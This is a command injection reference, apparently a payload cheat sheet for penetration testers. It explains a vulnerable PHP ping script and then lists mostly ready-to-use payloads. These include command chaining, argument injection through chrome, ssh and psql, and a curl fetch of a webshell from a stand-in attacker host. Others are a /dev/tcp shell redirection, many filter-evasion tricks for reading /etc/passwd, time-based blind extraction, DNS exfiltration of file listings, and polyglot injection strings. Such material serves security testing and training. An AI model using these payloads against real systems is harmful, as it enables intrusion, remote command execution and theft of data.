Command Injection/README.md
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
Example of Command Injection with PHP: Suppose you have a PHP script that takes a user input to ping a specified IP address or domain:
<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>
In the above code, the PHP script uses the system() function to execute the ping command with the IP address or domain provided by the user through the ip GET parameter.
If an attacker provides input like 8.8.8.8; cat /etc/passwd, the actual command that gets executed would be: ping -c 4 8.8.8.8; cat /etc/passwd.
This means the system would first ping 8.8.8.8 and then execute the cat /etc/passwd command, which would display the contents of the /etc/passwd file, potentially revealing sensitive information.
Execute the command and voila :p
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
...
In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands.
; (Semicolon): Allows you to execute multiple commands sequentially.&& (AND): Execute the second command only if the first command succeeds (returns a zero exit status).|| (OR): Execute the second command only if the first command fails (returns a non-zero exit status).& (Background): Execute the command in the background, allowing the user to continue using the shell.| (Pipe): Takes the output of the first command and uses it as the input for the second command.command1; command2 # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2 # Execute command1 in the background
command1 | command2 # Pipe the output of command1 into command2
Gain a command execution when you can only append arguments to an existing command. Use this website Argument Injection Vectors - Sonar to find the argument to inject to gain command execution.
Chrome
chrome '--gpu-launcher="id>/tmp/foo"'
SSH
ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
psql
psql -o'|id>/tmp/foo'
Argument injection can be abused using the worstfit technique.
In the following example, the payload " --use-askpass=calc " is using fullwidth double quotes (U+FF02) instead of the regular double quotes (U+0022)
$url = "https://example.tld/" . $_GET['path'] . ".txt";
system("wget.exe -q " . escapeshellarg($url));
Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell.
curl
# -o, --output <file> Write to file instead of stdout
curl http://evil.attacker.com/ -o webshell.php
Command injection using backticks.
original_cmd_by_server `cat /etc/passwd`
Command injection using substitution
original_cmd_by_server $(cat /etc/passwd)
$IFS is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret $IFS as a space. $IFS does not directly work as a separator in commands like ls, wget; use ${IFS} instead.
cat${IFS}/etc/passwd
ls${IFS}-la
In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments.
{cat,/etc/passwd}
Input redirection. The < character tells the shell to read the contents of the file specified.
cat</etc/passwd
sh</dev/tcp/127.0.0.1/4242
ANSI-C Quoting
X=$'uname\x20-a'&&$X
The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value 09.
;ls%09-al%09/home
In Windows, %VARIABLE:~start,length% is a syntax used for substring operations on environment variables.
ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1
Commands can also be run in sequence with newlines
original_cmd_by_server
ls
Commands can be broken into parts by using backslash followed by a newline
$ cat /et\
c/pa\
sswd
URL encoded form would look like this:
cat%20/et%5C%0Ac/pa%5C%0Asswd
echo ~+
echo ~-
{,ip,a}
{,ifconfig}
{,ifconfig,eth0}
{l,-lh}s
{,echo,#test}
{,$"whoami",}
{,/?s?/?i?/c?t,/e??/p??s??,}
Commands execution without backslash and slash - linux bash
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
w'h'o'am'i
wh''oami
'w'hoami
w"h"o"am"i
wh""oami
"wh"oami
wh``oami
w\ho\am\i
/\b\i\n/////s\h
$0: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell.
who$@ami
echo whoami|$0
who$()ami
who$(echo am)i
who`echo am`i
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
Windows does not distinguish between uppercase and lowercase letters when interpreting commands or file paths. For example, DIR, dir, or DiR will all execute the same dir command.
wHoAmi
Extracting data char by char and detect the correct value based on the delay.
Correct value: wait 5 seconds
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
Incorrect value: no delay
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
Based on the tool from HoLyVieR/dnsbin, also hosted at dnsbin.zhack.ca
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
Online tools to check for DNS based data exfiltration:
A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments.
Example 1:
Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
# Context inside commands with single and double quote:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
Example 2:
Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
# Context inside commands with single and double quote:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
In some instances, you might have a long running command that gets killed by the process injecting it timing out.
Using nohup, you can keep the process running after the parent process exits.
nohup sleep 120 > /dev/null &
In Unix-like command-line interfaces, the -- symbol is used to signify the end of command options. After --, all arguments are treated as filenames and arguments, and not as options.
Challenge based on the previous tricks, what does the following command do:
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
NOTE: The command is safe to run, but you should not trust me.